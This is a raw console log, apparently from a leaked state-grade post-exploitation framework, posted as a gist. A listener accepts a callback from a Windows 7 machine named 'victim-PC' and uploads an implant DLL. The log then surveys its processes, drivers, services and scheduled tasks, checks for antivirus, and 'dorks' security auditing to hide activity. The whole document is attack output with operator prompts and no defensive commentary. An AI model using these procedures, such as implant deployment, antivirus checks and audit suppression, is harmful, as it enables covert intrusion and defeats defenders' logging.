Created April 15, 2017 23:06
Gist: misterch0c/d75509a699ec1f518b6978ab0968af54

[22:59:16] ID: 1125 'pc_listen' started [target: z0.0.0.1]
Waiting for connection...
Setting Sockopt
Listening on [0.0.0.0]:443.
Setting Sockopt
Listening on [0.0.0.0]:80.
Setting Sockopt
Listening on [0.0.0.0]:53.
Setting Sockopt
Listening on [0.0.0.0]:1509.
Connection received from [192.168.0.249]:49356 to [192.168.0.118]:443...
Connection accepted
Starting session...
PC LP Version: 2.3.0
LP...ready to send the MAGIC NUMBER
Sending additional 358 bytes of random
LP ...ready to receive the symmetric key
LP...ready to decrypt the key
Remote Information
PC Version : 2.3.0
PC Id : 0x0000000000000000
Arch-Os : i386-winnt (compiled i386-winnt)
Session Key : ff 05 c1 bd 97 98 b5 3c 42 8d 73 03 0c c6 0d b3
Getting remote OS information
Remote OS
Arch : i386
Compiled Arch : i386
Platform : winnt
Compiled Platform : winnt
Version : 6.1 (Windows 7)
Service Pack : 1
C Lib Version : 6.0.0
Sending OS version check status to remote side (4 bytes)
Data (OS version check status) has been sent
Data (OS version check status) has been received and stored by remote side
Ready to send implant
Successfully loaded LP DLLs
Payload
File Name : D:\DSZOPSDisk\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll
Send payload : true
Original Size : 248832
Send Size : 137488
Checksum : c745
Name :
Path :
Export : #1
Sending PayloadInfo run type information
Sending File/Library info to remote side (36 bytes)
Data (File/Library info) has been sent
Data (File/Library info) has been received and stored by remote side
Sending Export name to remote side (3 bytes)
Data (Export name) has been sent
Data (Export name) has been received and stored by remote side
Sending Payload to remote side (137488 bytes)
Data (Payload) has been sent
Data (Payload) has been received and stored by remote side
... Receiving Acknowledgements
Received successful status message for Dll/Exe loaded
Received successful status message for About to run payload
Received successful status message for Exit This Message Loop
Setting remote address to z0.0.0.13
Remote Address : z0.0.0.13
Architecture : i386
Compiled Architecture : i386
Platform : winnt
Version : 6.1.1 (build 7601)
C Library Version : 6.0.0
Process Id : 496
Type : Dsz
Metadata : type=PC local=192.168.0.118:443 remote=192.168.0.249:49356
- Remote host is i386-winnt (6.1.1)
- --------------------------------------------------
- Performing setup for i386-winnt on z0.0.0.13
- --------------------------------------------------
- PROMPTED - Shutdown (CURRENT)
- Registering Mcl_NtElevation options
- SUCCESS
- Setting Mcl_NtElevation Type
- EpMe_GrSa
- Registering Mcl_NtNativeApi options
- SUCCESS
- Setting Mcl_NtNativeApi Type
- WIN32
- Registering Mcl_NtMemory options
- SUCCESS
- Setting Mcl_NtMemory Type
- Std
- Registering Mcl_ThreadInject options
- SUCCESS
- Setting Mcl_ThreadInject Type
- Std
Unable to get target DB for unknown target
Able to load audit plugin, NT_ELEVATION loaded correctly, moving on
- Current process options (0xd)
- DisableThunkEmulation
- ExecutionDisabled
- Permanent
Do you want to modify the process options?
NO
- DISABLED - Authentication (CURRENT)
- --------------------------------------------------
- Getting remote time
- RETRIEVED
- Getting host information
- RETRIEVED
- Getting OS GUID information
- RETRIEVED
- Storing host information
- STORED
- User is ADMINISTRATOR
-
--------------------------------------------------
Running command 'python Connected/Connected.py -project Ops'
Unable to get target DB for unknown target
- --------------------------------------------------
- Re-registering global wrappers for current target
- --------------------------------------------------
- hide - Windows kernel 6.0+ PatchGuard protection
- packetredirect - Trigger failure alerter
- --------------------------------------------------
Showing you what we know so you can make a good decision in the menu below
crypto_guid: b2520430-4565-417f-b4e8-0668971c30f9
hostname: victim-PC
macs: [u'08-00-27-bb-ef-c8']
implant_id: 0x0000000000000000
Below match threshold or multiple matches. You must choose. Choose wisely.
0) None of these - create a new target db
1) (Confidence: 0.8) test / victim-PC / PC ID 0x0000000000000000 / b2520430-4565-417f-b4e8-0668971c30f9 / MACS: ['08-00-27-bb-ef-c8']
Enter selection:
1
- [2017-04-15 16:01:44 z0.0.0.13] Target ID completed, ID 2c37f2f0-55d8-4e56-bbcb-656b9d98c775 (in project test)
- [2017-04-15 16:01:44 z0.0.0.13] You have been on this target previously with the following CP addresses
z0.0.0.12
z0.0.0.11
====================================================================
- [2017-04-15 16:01:44 z0.0.0.13] Showing ifconfig data so you can make sure you are on the correct target
FQDN: victim-PC
DNS Servers: 195.130.131.1, 195.130.130.1
- [2017-04-15 16:01:45 z0.0.0.13] Showing all non-local and non-tunnel encapsulation adapter information, see command 1206 for full interface list
| Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
+--------------------------------------+-------------------+---------------+---------------+---------------------------------+-------------+----------------------------------------------------------------+
| Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-BB-EF-C8 | 192.168.0.249 | 255.255.255.0 | fe80::de53:7cff:fef2:b96e%%%%11 | 192.168.0.1 | Local Area Connection ({C63B0135-2C21-412E-92E7-A6FEB149081E}) |
Running command 'survey -run D:\DSZOPSDisk\Resources\Ops\Data\survey.xml -sections env-setup -quiet'
Running command 'systemversion '
Architecture : i386
OS Family : winnt
Version : 6.1 (Build 7601)
Platform : Windows 7
Service Pack : 1.0
Extra Info : Service Pack 1
Product Type : Workstation / Professional
Terminal Services is installed, but only one interactive session is supported.
Command completed successfully
- [2017-04-15 16:01:48 z0.0.0.13] 1 safety handler registered for AUDIT
- [2017-04-15 16:01:48 z0.0.0.13] 1 safety handler registered for DRIVERS
- [2017-04-15 16:01:48 z0.0.0.13] Loaded safety handlers from previous op(s)
Command completed successfully
Running command 'survey -run'
- [2017-04-15 16:01:50 z0.0.0.13] ================================== Process list ==================================================================
- [2017-04-15 16:01:52 z0.0.0.13] Data age: 01 seconds - data is fresh
- | PID | PPID | Full Path | User | Comment |
- +------+------+--------------------------------------------------+------------------------------+------------------------------------------------------------+
- | 0 | 0 | | | |
- | 4 | 0 | System | | System Kernel |
- | 232 | 4 | ---\SystemRoot\System32\smss.exe | NT AUTHORITY\SYSTEM | Session Manager Subsystem |
- | 300 | 292 | csrss.exe | | Client-Server Runtime Server Subsystem |
- | 336 | 292 | C:\Windows\system32\wininit.exe | NT AUTHORITY\SYSTEM | Vista background service launcher |
- | 428 | 336 | ---C:\Windows\system32\services.exe | NT AUTHORITY\SYSTEM | Windows Service Controller |
- | 536 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 616 | 428 | ------svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 688 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 760 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 248 | 760 | ---------C:\Windows\system32\Dwm.exe | victim-PC\victim | Vista Desktop Window Manager |
- | 796 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 3772 | 796 | ---------C:\Windows\system32\wuauclt.exe | victim-PC\victim | Microsoft Windows Update |
- | 968 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1096 | 428 | ------svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1236 | 428 | ------spoolsv.exe | NT AUTHORITY\SYSTEM | Microsoft Printer Spooler Service |
- | 1264 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1368 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 276 | 428 | ------C:\Windows\system32\taskhost.exe | victim-PC\victim | Windows 7 Generic Host Process |
- | 2032 | 428 | ------SearchIndexer.exe | NT AUTHORITY\SYSTEM | Microsoft search indexer |
- | 1152 | 428 | ------wmpnetwk.exe | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service |
- | 2132 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 3296 | 428 | ------C:\Program Files\EMET 5.5\EMET_Service.exe | NT AUTHORITY\SYSTEM | |
- | 3424 | 428 | ------sppsvc.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service |
- | 3456 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 440 | 336 | ---C:\Windows\system32\lsass.exe | NT AUTHORITY\SYSTEM | Local Security Authority Server Subsystem |
- | 448 | 336 | ---C:\Windows\system32\lsm.exe | NT AUTHORITY\SYSTEM | Vista Local Session Manager |
- | 344 | 328 | csrss.exe | | Client-Server Runtime Server Subsystem |
- | 2448 | 344 | ---C:\Windows\system32\conhost.exe | victim-PC\victim | Microsoft Console Windows Host |
- | 372 | 328 | C:\Windows\system32\winlogon.exe | NT AUTHORITY\SYSTEM | Microsoft Windows Logon Process |
- | 496 | 100 | C:\Windows\Explorer.EXE | victim-PC\victim | Windows Explorer Shell |
- | 296 | 496 | ---C:\Windows\system32\cmd.exe | victim-PC\victim | +++ Windows Command Prompt +++ |
- | 2768 | 496 | ---C:\Windows\system32\taskmgr.exe | victim-PC\victim | +++ Windows Task Manager +++ |
background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor \" "
- [2017-04-15 16:01:53 z0.0.0.13] ===================================== Uptime =====================================================================
Uptime: -1 days, 10:11:53
- [2017-04-15 16:01:54 z0.0.0.13] ================== Auditing status check, dorking will be later ==================================================
- [2017-04-15 16:01:54 z0.0.0.13] Data age: 24:58 (from local cache, re-run manually if you need to)
- [2017-04-15 16:01:54 z0.0.0.13] Auditing is enabled on this machine
| Category | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange | True | False |
| System_Integrity | True | True |
| System_Others | True | True |
| Logon_Logon | True | False |
| Logon_Logoff | True | False |
| Logon_AccountLockout | True | False |
| Logon_SpecialLogon | True | False |
| Logon_NPS | True | True |
| PolicyChange_AuditPolicy | True | False |
| PolicyChange_AuthenticationPolicy | True | False |
| AccountManagement_UserAccount | True | False |
| AccountManagement_SecurityGroup | True | False |
- [2017-04-15 16:01:54 z0.0.0.13] The above is only being shown for informational purposes, you will be prompted about dorking later
- [2017-04-15 16:01:54 z0.0.0.13] =================================== Driver list ===================================================================
Running command 'python D:\DSZOPSDisk\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"'
- | Driver | Path | Flags | Comment | Type | First Seen | Also On |
- +------------------+-----------------------------+----------------+----------------------------------+---------+------------+------------+
- | dump_dumpata.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC |
- | dump_dumpfve.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC |
- | dump_msahci.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC |
Command completed successfully
- [2017-04-15 16:01:58 z0.0.0.13] =============================== Installed software ===============================================================
- --------------------------------------------------------------- Installer Packages ---------------------------------------------------------------
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:50 (from local cache, re-run manually if you need to)
| Arcitecture | Name | Description | Installed version | Date installed |
+-------------+------------------------------+-----------------------+-------------------+----------------+
| 32-bit | EMET 5.5 | Microsoft Corporation | 5.5 | 2017-04-15 |
| 32-bit | Microsoft .NET Framework 4.5 | Microsoft Corporation | 4.5.50709 | |
| 32-bit | Microsoft .NET Framework 4.5 | Microsoft Corporation | 4.5.50709 | 2017-04-15 |
- ----------------------------------------------------------------- Software key(s) -----------------------------------------------------------------
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:44 (from local cache, re-run manually if you need to)
| Architecture | Name | Last update |
+--------------+------------------------+-------------+
| 32-bit | ATI Technologies | 2009-07-14 |
| 32-bit | CBSTEST | 2017-04-15 |
| 32-bit | Classes | 2017-04-16 |
| 32-bit | Clients | 2009-07-14 |
| 32-bit | Intel | 2009-07-14 |
| 32-bit | Microsoft | 2017-04-16 |
| 32-bit | ODBC | 2009-07-14 |
| 32-bit | Policies | 2009-07-14 |
| 32-bit | RegisteredApplications | 2011-04-12 |
| 32-bit | RT 7 Lite | 2014-04-19 |
| 32-bit | Sonic | 2011-04-12 |
| 32-bit | WOW6432Node | 2017-04-15 |
- -------------------------------------------------------------- Program files dir(s) --------------------------------------------------------------
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:40 (from local cache, re-run manually if you need to)
| Architecture | Folder Name | Modified |
+--------------+--------------------------+-------------------------------+
| 32-bit | Common Files | 2009-07-14T02:37:05.485289900 |
| 32-bit | DVD Maker | 2011-04-12T02:24:27.829375000 |
| 32-bit | EMET 5.5 | 2017-04-16T03:24:44.011648000 |
| 32-bit | Internet Explorer | 2011-04-12T02:16:02.751250000 |
| 32-bit | Microsoft Games | 2011-04-12T02:24:27.032500000 |
| 32-bit | Microsoft.NET | 2017-04-16T03:22:03.169296000 |
| 32-bit | MSBuild | 2009-07-14T04:52:30.938524700 |
| 32-bit | Reference Assemblies | 2009-07-14T04:52:30.938524700 |
| 32-bit | Uninstall Information | 2009-07-14T04:53:23.912062200 |
| 32-bit | Windows Defender | 2011-04-12T02:16:02.720000000 |
| 32-bit | Windows Journal | 2011-04-12T02:24:24.860625000 |
| 32-bit | Windows Mail | 2011-04-12T02:16:02.751250000 |
| 32-bit | Windows Media Player | 2011-04-12T02:16:02.735625000 |
| 32-bit | Windows NT | 2009-07-14T04:52:30.954124700 |
| 32-bit | Windows Photo Viewer | 2011-04-12T02:16:02.735625000 |
| 32-bit | Windows Portable Devices | 2010-11-20T21:33:48.579615600 |
| 32-bit | Windows Sidebar | 2011-04-12T02:16:02.782500000 |
z0.0.0.13: [2017-04-15 16:01:58] Hashhunter completed on victim-PC!
- [2017-04-15 16:01:58 z0.0.0.13] ================================ Running services ================================================================
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:38 (from local cache, re-run manually if you need to)
| Display name | Service name |
+--------------------------------------------------+----------------------+
| Application Experience | AeLookupSvc |
| Application Information | Appinfo |
| Windows Audio Endpoint Builder | AudioEndpointBuilder |
| Windows Audio | Audiosrv |
| Base Filtering Engine | BFE |
| Background Intelligent Transfer Service | BITS |
| Computer Browser | Browser |
| Certificate Propagation | CertPropSvc |
| Cryptographic Services | CryptSvc |
| Offline Files | CscService |
| DCOM Server Process Launcher | DcomLaunch |
| DHCP Client | Dhcp |
| DNS Client | Dnscache |
| Diagnostic Policy Service | DPS |
| Microsoft EMET Service | EMET_Service |
| Windows Event Log | eventlog |
| COM+ Event System | EventSystem |
| Function Discovery Provider Host | fdPHost |
| Function Discovery Resource Publication | FDResPub |
| Windows Font Cache Service | FontCache |
| Group Policy Client | gpsvc |
| HomeGroup Listener | HomeGroupListener |
| HomeGroup Provider | HomeGroupProvider |
| IP Helper | iphlpsvc |
| CNG Key Isolation | KeyIso |
| Server | LanmanServer |
| Workstation | LanmanWorkstation |
| TCP/IP NetBIOS Helper | lmhosts |
| Windows Firewall | MpsSvc |
| Network Connections | Netman |
| Network List Service | netprofm |
| Network Location Awareness | NlaSvc |
| Network Store Interface Service | nsi |
| Peer Networking Identity Manager | p2pimsvc |
| Peer Networking Grouping | p2psvc |
| Plug and Play | PlugPlay |
| Peer Name Resolution Protocol | PNRPsvc |
| Power | Power |
| User Profile Service | ProfSvc |
| RPC Endpoint Mapper | RpcEptMapper |
| Remote Procedure Call (RPC) | RpcSs |
| Security Accounts Manager | SamSs |
| Task Scheduler | Schedule |
| Secondary Logon | seclogon |
| System Event Notification Service | SENS |
| Remote Desktop Configuration | SessionEnv |
| Shell Hardware Detection | ShellHWDetection |
| Print Spooler | Spooler |
| Software Protection | sppsvc |
| SPP Notification Service | sppuinotify |
| SSDP Discovery | SSDPSRV |
| Remote Desktop Services | TermService |
| Themes | Themes |
| Distributed Link Tracking Client | TrkWks |
| Remote Desktop Services UserMode Port Redirector | UmRdpService |
| UPnP Device Host | upnphost |
| Desktop Window Manager Session Manager | UxSms |
| Diagnostic Service Host | WdiServiceHost |
| Windows Defender | WinDefend |
| Windows Management Instrumentation | Winmgmt |
| Windows Media Player Network Sharing Service | WMPNetworkSvc |
| Security Center | wscsvc |
| Windows Search | WSearch |
| Windows Update | wuauserv |
- [2017-04-15 16:01:59 z0.0.0.13] =================================== AV Check!!! ===================================================================
Running command 'python windows\checkpsp.py -project Ops '
- Checking for any running known PSP's...
- microsoft
-
- Checking for target PSP history...
- Found configuration history for Microsoft.
- Saw PSP's we can act on. Running scripts.
- ============================================
- = microsoft =
- ============================================
- Checking for a change in configuration
- The following PSPs had NO changes:
- Microsoft Windows Defender Windows 7 Ultimate
- +--------------------+--------------------+
- | | Setting Value |
- +--------------------+--------------------+
- | vendor | Microsoft |
- | product | Windows Defender |
- | version | Windows 7 Ultimate |
- | Definition Updates | None |
- | Information | None |
- | Install Date | None |
- | Log File | None |
- | Quarantine | None |
- | ServiceStart | 2 |
- | Software | PSP |
- | SpyNet | 1 |
- | Status | Enabled |
- +--------------------+--------------------+
Command completed successfully
- [2017-04-15 16:02:11 z0.0.0.13] ================================ Auditing dorking ================================================================
- [2017-04-15 16:02:11 z0.0.0.13] Data age: 25:15 (from local cache, re-run manually if you need to)
- [2017-04-15 16:02:11 z0.0.0.13] Auditing is enabled on this machine
| Category | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange | True | False |
| System_Integrity | True | True |
| System_Others | True | True |
| Logon_Logon | True | False |
| Logon_Logoff | True | False |
| Logon_AccountLockout | True | False |
| Logon_SpecialLogon | True | False |
| Logon_NPS | True | True |
| PolicyChange_AuditPolicy | True | False |
| PolicyChange_AuthenticationPolicy | True | False |
| AccountManagement_UserAccount | True | False |
| AccountManagement_SecurityGroup | True | False |
Do you want to dork security auditing?
YES
- [2017-04-15 16:02:23 z0.0.0.13] Security auditing dorked, do not stop command 1237 or you will lose your blessing
- [2017-04-15 16:02:23 z0.0.0.13] ==================================== Monitors ====================================================================
Monitors
-----------------------------
1) Full - arp, netstat, activity
2) Netstat and activity
3) Activity only
4) Done
Select your monitors (full recommended for most situations): [1] 4
- [2017-04-15 16:02:32 z0.0.0.13] Process deep started in the background as command ID 1239.
- [2017-04-15 16:02:32 z0.0.0.13] Informational SIG check started in the background as command ID 1240.
- [2017-04-15 16:02:32 z0.0.0.13] ================================ Scheduler survey ================================================================
- [2017-04-15 16:02:34 z0.0.0.13] Data age: 24:46 (from local cache, re-run manually if you need to)
| source | command | nextrun | triggers | runas | jobname |
+---------+------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------+-----------------------------------------------+-----------------------+------------------------------------------------------------------------------------------------------+
| SERVICE | COM job ClassID and data: {BF5CB148-7C77-4D8A-A53E-D81C70CF743C} - | LOGON | LOGON | LEAST | Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) |
| SERVICE | aitagent (runs in "") | DAILY 2007-10-08T02:30:00 | DAILY 2007-10-08T02:30:00 | SYSTEM LEAST | Application Experience\AitAgent |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe aepdu.dll,AePduRunUpdate (runs in "") | DAILY 2007-10-08T00:30:00 | DAILY 2007-10-08T00:30:00 | SYSTEM LEAST | Application Experience\ProgramDataUpdater |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations (runs in "") | BOOT | BOOT | LOCAL SERVICE LEAST | Autochk\Proxy |
| SERVICE | BthUdTask.exe $(Arg0) (runs in "") | | | SYSTEM LEAST | Bluetooth\UninstallDeviceTask |
| SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - SYSTEM | EVENT , REGISTRATION , BOOT | EVENT , REGISTRATION , BOOT | SYSTEM LEAST | CertificateServicesClient\SystemTask |
| SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - USER | EVENT , REGISTRATION , LOGON | EVENT , REGISTRATION , LOGON | LEAST | CertificateServicesClient\UserTask |
| SERVICE | %%%%SystemRoot%%%%\System32\wsqmcons.exe (runs in "") | TIME 2004-01-02T00:00:00 | TIME 2004-01-02T00:00:00 | SYSTEM LEAST | Customer Experience Improvement Program\Consolidator |
| SERVICE | COM job ClassID and data: {E7ED314F-2816-4C26-AEB5-54A34D02404C} - | WEEKLY 2008-09-01T03:30:00 | WEEKLY 2008-09-01T03:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\KernelCeipTask |
| SERVICE | COM job ClassID and data: {C27F6B1D-FE0B-45E4-9257-38799FA69BC8} - SYSTEM | DAILY 2008-04-25T01:30:00 | DAILY 2008-04-25T01:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\UsbCeip |
| SERVICE | %%%%windir%%%%\system32\defrag.exe -c (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | SYSTEM HIGHEST | Defrag\ScheduledDefrag |
| SERVICE | COM job ClassID and data: {C1F85EF8-BCC2-4606-BB39-70C523715EB3} - | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | HIGHEST | Diagnosis\Scheduled |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART (runs in "") | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | SYSTEM LEAST | DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector |
| SERVICE | %%%%windir%%%%\System32\LocationNotifications.exe (runs in "") | EVENT | EVENT | LEAST | Location\Notifications |
| SERVICE | COM job ClassID and data: {A9A33436-678B-4C9C-A211-7CC38785E79D} - | WEEKLY 2008-01-01T01:00:00 | WEEKLY 2008-01-01T01:00:00 | HIGHEST | Maintenance\WinSAT |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoActivateWindowsSearch (runs in "") | | | SYSTEM LEAST | Media Center\ActivateWindowsSearch |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (runs in "") | | | SYSTEM LEAST | Media Center\ConfigureInternetTimeService |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\DispatchRecoveryTasks |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DRMInit (runs in "") | | | LOCAL SERVICE LEAST | Media Center\ehDRMInit |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\InstallPlayReady |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate $(Arg0) (runs in "") | | | NETWORK SERVICE LEAST | Media Center\mcupdate |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -MediaCenterRecoveryTask (runs in "") | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
| SERVICE | COM job ClassID and data: {23E5D772-327A-42F5-BDEE-C65C6796BB2A} - $(Arg1) | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -ObjectStoreRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
| SERVICE | COM job ClassID and data: {177AFECE-9599-46CF-90D7-68EC9EEB27B4} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURActivate (runs in "") | | | SYSTEM LEAST | Media Center\OCURActivate |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\OCURDiscovery |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscovery |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW1 |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW2 |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
| SERVICE | COM job ClassID and data: {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrSchedule (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
| SERVICE | COM job ClassID and data: {CEF51277-5358-477B-858C-4E14F0C80BF7} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\RegisterSearch |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoReindexSearchRoot (runs in "") | | | SYSTEM LEAST | Media Center\ReindexSearchRoot |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -SqlLiteRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
| SERVICE | COM job ClassID and data: {59116E30-02BD-4B84-BA1E-5D77E809B1A2} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\UpdateRecordPath |
| SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - PageNotZero | EVENT | EVENT | LEAST | MemoryDiagnostic\CorruptionDetector |
| SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - Decompression | EVENT | EVENT | LEAST | MemoryDiagnostic\DecompressionFailureDetector |
| SERVICE | COM job ClassID and data: {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - | LOGON | LOGON | LEAST | MobilePC\HotStart |
| SERVICE | %%%%windir%%%%\system32\lpremove.exe (runs in "") | BOOT | BOOT | SYSTEM HIGHEST | MUI\LPRemove |
| SERVICE | COM job ClassID and data: {2DEA658F-54C1-4227-AF9B-260AB5FC3543} - | LOGON | LOGON | LEAST | Multimedia\SystemSoundsService |
| SERVICE | %%%%windir%%%%\system32\gatherNetworkInfo.vbs (runs in "$(Arg1)") | | | HIGHEST | NetTrace\GatherNetworkInfo |
| SERVICE | %%%%SystemRoot%%%%\System32\powercfg.exe -energy -auto (runs in "") | DAILY 2008-01-01T06:00:00 | DAILY 2008-01-01T06:00:00 | SYSTEM LEAST | Power Efficiency Diagnostics\AnalyzeSystem |
| SERVICE | COM job ClassID and data: {42060D27-CA53-41F5-96E4-B1E8169308A6} - $(Arg0) | EVENT , TIME 2008-03-31T00:00:00Z | EVENT , TIME 2008-03-31T00:00:00Z | LOCAL SERVICE LEAST | RAC\RacTask |
| SERVICE | COM job ClassID and data: {C463A0FC-794F-4FDF-9201-01938CEACAFA} - | EVENT | EVENT | LOCAL SERVICE LEAST | Ras\MobilityManager |
| SERVICE | COM job ClassID and data: {CA767AA8-9157-4604-B64B-40747123D5F2} - | DAILY 2008-01-01T00:00:00 | DAILY 2008-01-01T00:00:00 | SYSTEM LEAST | Registry\RegIdleBackup |
| SERVICE | %%%%windir%%%%\system32\RAServer.exe /offerraupdate (runs in "%%%%windir%%%%") | EVENT , REGISTRATION | EVENT , REGISTRATION | SYSTEM HIGHEST | RemoteAssistance\RemoteAssistanceTask |
| SERVICE | COM job ClassID and data: {FF87090D-4A9A-4F47-879B-29A80C355D61} - $(Arg0) | LOGON | LOGON | LEAST | SideShow\GadgetManager |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation (runs in "") | DAILY 2005-06-14T00:00:00 , BOOT | DAILY 2005-06-14T00:00:00 , BOOT | SYSTEM LEAST | SystemRestore\SR |
| SERVICE | COM job ClassID and data: {855FEC53-D2E4-4999-9E87-3414E9CF0FF4} - $(Arg0) | | | LEAST | Task Manager\Interactive |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (runs in "") | EVENT | EVENT | HIGHEST | Tcpip\IpAddressConflict1 |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (runs in "") | EVENT 2006-02-23T16:27:43 | EVENT 2006-02-23T16:27:43 | HIGHEST | Tcpip\IpAddressConflict2 |
| SERVICE | COM job ClassID and data: {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} - | LOGON | LOGON | LEAST | TextServicesFramework\MsCtfMonitor |
| SERVICE | %%%%windir%%%%\system32\sc.exe start w32time task_started (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | LOCAL SERVICE HIGHEST | Time Synchronization\SynchronizeTime |
| SERVICE | sc.exe config upnphost start= auto (runs in "") | | | SYSTEM LEAST | UPnP\UPnPHostConfig |
